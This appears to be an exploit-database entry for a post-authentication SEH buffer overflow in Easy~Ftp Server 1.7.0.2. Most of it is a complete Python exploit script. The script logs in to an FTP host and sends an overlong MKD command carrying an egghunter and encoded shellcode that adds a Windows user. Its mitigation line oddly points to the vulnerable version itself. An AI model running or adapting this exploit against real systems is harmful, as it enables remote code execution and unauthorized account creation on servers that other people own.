Easy~Ftp Server v1.7.0.2 Post-Authentication BoF

vendor:

Easy~Ftp Server

by:

b33f - Ruben Boonen

9.3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Easy~Ftp Server

Affected Version From: 1.7.0.2

Affected Version To: 1.7.0.2

Patch Exists: YES

Related CWE: N/A

CPE: a:easyftpsvr:easyftpsvr:1.7.0.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP Home SP1

2009

Easy~Ftp Server v1.7.0.2 Post-Authentication BoF

A buffer overflow vulnerability exists in Easy~Ftp Server v1.7.0.2 due to improper bounds checking of user-supplied input. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application. This vulnerability is triggered when a malicious user sends a specially crafted MKD command with an overly long string, which can overwrite the SEH handler and cause a buffer overflow.

Mitigation:

Upgrade to the latest version of Easy~Ftp Server v1.7.0.2 or later.

Source

Exploit-DB raw data:

#!/usr/bin/python

# Title: Easy~Ftp Server v1.7.0.2 Post-Authentication BoF
# Original Author: dookie2000ca || Windows XP SP3 Professional
# Author: b33f - Ruben Boonen
# Windows XP Home SP1
# Software link: http://cdnetworks-us-2.dl.sourceforge.net/project/easyftpsvr/easyftpsvr/1.7.0.2-en/easyftpsvr-1.7.0.2.zip

import socket
import sys

#-------------------------------------------------------------------------------
#SE Handler is overwritten - offset to SEH 256
#short jump \xEB\x07
#pop pop ret rpcrt4.dll 78011926
#badchars 0x00 0x0a 0x2f 0x5c
#-------------------------------------------------------------------------------

bunny = (
"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
"\x77\x30\x30\x74" # egghunter marker w00t
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")

#win32_adduser - PASS=u EXITFUNC=seh USER=fuck Size=228 Encoder=ShikataGaNai
shellcode = (
"\xdb\xd3\x31\xc9\xb8\x5d\x82\xf8\x52\xb1\x34\xd9\x74\x24\xf4\x5f"
"\x83\xc7\x04\x31\x47\x13\x03\x1a\x91\x1a\xa7\x58\x7d\x9e\x48\xa0"
"\x7e\x94\x0c\x9c\xf5\xd6\x8b\xa4\x08\xc8\x1f\x1b\x13\x9d\x7f\x83"
"\x22\x4a\x36\x48\x10\x07\xc8\xa0\x68\xd7\x52\x90\x0f\x17\x10\xef"
"\xce\x52\xd4\xee\x12\x89\x13\xcb\xc6\x6a\xd8\x5e\x02\xf9\xbf\x84"
"\xcd\x15\x59\x4f\xc1\xa2\x2d\x10\xc6\x35\xd9\x25\xea\xbe\x1c\xd2"
"\x9a\x9d\x3a\x20\x5e\x2c\x83\x4c\xeb\x0f\x33\x09\x2b\xf7\x3f\x9a"
"\xec\x04\xcb\xec\xf0\xb9\x40\x64\x01\x29\x5f\xff\x91\x1d\x60\xff"
"\x91\xd6\x09\xc3\xce\xd9\x3f\x5b\xa7\x90\x38\x18\x87\xd8\xe8\x76"
"\xf8\x95\x0d\xd9\x90\x31\xf3\x6f\x6e\x15\xf3\x88\x0c\xf4\x6f\x78"
"\xb6\x7e\x15\xa4\x17\x1c\xf5\xca\x02\x96\xd5\x67\xbe\x33\x64\xa7"
"\x26\xc9\xeb\xcc\x86\x44\xcc\x3d\x86\xe2\x48\x61\x2e\xcd\x70\x0f"
"\x4b\x65\x51\xa3\xfc\xe6\xf0\x57\x64\x9b\x9d\xd2\x1a\x7b\x23\x78"
"\xb6\x12\xcd\xe9\x3b\x91\x63\x88\xcf\x36\xf6\x39\x10\xaf\x83\xde"
"\x3b\x0f\x43\x61\xf8\x0b\x9b")

payload = "A"*7 + "w00tw00t" + shellcode + "A"*10 + "\xEB\x07\x90\x90" + "\x26\x19\x01\x78" + "\x90"*25 + bunny + "A"*133

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.1.70',21))
s.recv(1024)
s.send('USER b33f\r\n')
s.recv(1024)
s.send('PASS b33f\r\n')
s.recv(1024)
s.send('MKD ' + payload + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close